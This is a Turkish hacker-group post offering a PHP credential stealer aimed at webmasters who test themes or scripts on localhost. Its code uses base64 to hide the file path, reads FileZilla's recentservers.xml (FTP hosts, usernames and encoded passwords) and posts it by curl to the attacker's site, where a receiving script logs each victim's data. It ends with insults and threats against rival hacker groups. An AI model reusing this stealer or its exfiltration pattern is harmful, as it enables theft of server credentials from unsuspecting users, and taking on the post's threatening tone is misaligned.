Method tamamen tarafımızca kodlanmıştır.

Düşünün ki webmaster veya sitesi olan kişiler tema veya scriptleri ilk öncelikle localhost’a kurarak denemektedir fakat kimse bilmez ki localhost bilgisayarda ki dosyalara erişim sağlamaktadır 🙂

Filezilla ise önceden girdiğiniz ftp hesaplarını last login olarak listelemektedir /AppData/Roaming/FileZilla/recentservers.xml dosyasında

Localhost’a atacağımız dosyada kişinin bilgisayar adını @exec(“echo %username%”); komutu ile öğrendik

Php ile file read işlemi uyguladık ve kişinin kendi bilgisayarındaki recentservers.xml dosyasını okuduk

Ve çekilen kodları curl/post ile kendi sitemize kaydettik

<?php
$u = @exec("echo %username%");
$omega = base64_decode("QzovVXNlcnMv");
$z = $u;
$_0 = base64_decode("L0FwcERhdGEvUm9hbWluZy9GaWxlWmlsbGEvcmVjZW50c2VydmVycy54bWw=");
$family = ("".$omega."".$z."".$_0."");
$under = fopen($family, 'r');
$under_family = fread($under, filesize($family));

$ch2 = curl_init("https://siteniz.com/kaydet.php");
curl_setopt ($ch2, CURLOPT_POST, true);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, "f=".$under_family."&m=".$z."");
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_VERBOSE, 1);
curl_setopt($ch2, CURLOPT_NOBODY, 0);
$post = curl_exec($ch2);
curl_close($ch2);
?>

Sitemizde ki kaydet.php ile filezilla verilerini sitemize kaydettik

<?php
if(empty($_POST["m"] and $_POST["f"])) {
exit;
}
$under_k = fopen('filezilla-'.$_POST["m"].'.txt', 'a+');
fwrite($under_k, $_POST["f"]);
fclose($under_k);
?>

recentservers.xml dosyasında sunucu ip adresi kullanıcı adı ve şifre gözüküyor şifre base64 ile şifrelenmiş olarak bulunur

Bu elimizde ki en basit methodlardan biri ki spyhackerz ekibi bunu çok büyütmüş bulunmakta bu daha dağın görünen kısmı merak etmeyin 🙂

İzocinden rat(Python) yediğini biliyor muydun mec yoksa bilmiyor muydun? Hahahahaha

Sql sorgusunu doğru düzgün yapamayıp db şişiren hector kadar acizleştin gözümüzde mec Python rat yemek nedir ya? Yılların tecrübesi hahahahaa

Sözde tarafsız hack haber siteniz konuyu açmadı unutmayın ki sizin için daha çok method zulada unutmayın ki underfamily mezarınız olur

Hector bir ara [email protected]’a mail at database sorgu nasıl yapılır göstereyim sözde php biliyorsunuz *sözde*…